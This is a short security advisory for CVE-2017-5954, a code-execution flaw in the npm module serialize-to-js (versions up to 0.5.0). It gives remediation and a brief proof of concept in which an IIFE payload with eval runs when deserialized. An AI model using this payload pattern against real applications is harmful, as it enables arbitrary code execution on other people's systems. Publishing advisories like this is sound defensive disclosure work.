Code Execution Through IIFE

Module: serialize-to-js

Published: February 10th, 2017

Reported by: Ajin Abraham

CVE-2017-5954

CWE-502

Vulnerable: <=0.5.0
Patched: >=1.0.0

Overview

Affected versions of serialize-to-js may be vulnerable to arbitrary code execution through an Immediately Invoked Function Expression (IIFE).

Proof of Concept

var payload = "{e: (function(){ eval('console.log(`exploited`)') })() }"
var serialize = require('serialize-to-js');
serialize.deserialize(payload);

Remediation

Update to version 1.0.0, or later, and review this disclaimer from the author.

References

https://www.npmjs.com/package/serialize-to-js#deserialize